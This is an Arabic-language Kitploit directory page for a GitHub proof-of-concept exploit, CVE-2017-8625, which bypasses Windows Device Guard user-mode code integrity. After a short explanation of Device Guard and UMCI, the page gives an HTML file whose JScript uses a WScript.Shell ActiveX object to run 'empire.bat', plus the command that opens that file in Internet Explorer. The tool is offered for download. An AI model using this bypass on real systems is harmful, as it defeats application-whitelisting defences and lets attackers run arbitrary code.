Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-8625_Bypass_UMCI — استغلال إثبات المفهوم يوضح تجاوز UMCI في إنترنت إكسبلورر باستخدام JScript وActiveX لتنفيذ ملفات ثنائية عشوائية، مستهدفًا سياسات تكامل الكود في Windows Device Guard. | Kitploit
أدوات/GitHubGitHub/homjxi0e/cve-2017-8625_bypass_umci
تصعيد الامتيازاتتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubhomjxi0e/cve-2017-8625_bypass_umci

CVE-2017-8625_Bypass_UMCI

استغلال إثبات المفهوم يوضح تجاوز UMCI في إنترنت إكسبلورر باستخدام JScript وActiveX لتنفيذ ملفات ثنائية عشوائية، مستهدفًا سياسات تكامل الكود في Windows Device Guard.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
114منذ 9 سنواتلم تتم المراجعة بعد

ما هو ! Windows Defender Device Guard !


Windows Defender Device Guard هو مزيج من ميزات الأمان المتعلقة بالأجهزة والبرامج على مستوى المؤسسات، والتي عند تهيئتها معًا ستقوم بقفل الجهاز بحيث يمكنه فقط تشغيل التطبيقات الموثوقة التي تحددها في سياسات سلامة الكود الخاصة بك. إذا لم يكن التطبيق موثوقًا، فلن يتمكن من التشغيل، نقطة. مع الأجهزة التي تلبي المتطلبات الأساسية، فهذا يعني أيضًا أنه حتى إذا تمكن المهاجم من السيطرة على نواة Windows، فستكون فرصته في تشغيل كود قابل للتنفيذ ضار أقل بكثير. مع الأجهزة المناسبة، يمكن لـ Windows Defender Device Guard استخدام الميزة الجديدة للأمان القائم على المحاكاة الافتراضية في Windows 10 (المتاحة في إصدارات Enterprise و Education لأجهزة سطح المكتب وفي جميع إصدارات Server) لعزل خدمة سلامة الكود عن نواة Microsoft Windows نفسها. في هذه الحالة، تعمل خدمة سلامة الكود جنبًا إلى جنب مع النواة في حاوية محمية بواسطة برنامج hypervisor الخاص بنظام Windows. يشرح هذا الدليل الميزات الفردية في Windows Defender Device Guard بالإضافة إلى كيفية التخطيط لها، وتكوينها، ونشرها. ويتضمن:

ما هو UMCI

يمنع UMCI تنفيذ الثنائيات غير المعتمدة، ويقيد Windows Scripting Host، ويضع PowerShell في وضع اللغة المقيدة. يجعل هذا الحصول على تنفيذ الكود على النظام أمرًا صعبًا إلى حد ما. هذا المنشور سيستمر

======================================================================||>

تجاوز UMCI في Enternet Explorer بواسطة Jscript !

لنقم بعرض تجاوز الكود

======================================================================||>

root@kitploit:~
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>

======================================================================||>

root@kitploit:~
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"

تعديل كود Jscript !

لقطة شاشة من 2017-08-25 11-55-12 ======================================================================||>

تشغيل التجاوز التالي

لقطة شاشة من 2017-08-25 11-56-01

======================================================================||> ======================================================================||>

شرح المؤلف

@Matt Homjxi0e

المؤلف للتجاوز

@enigma0x3

تنزيل الأداة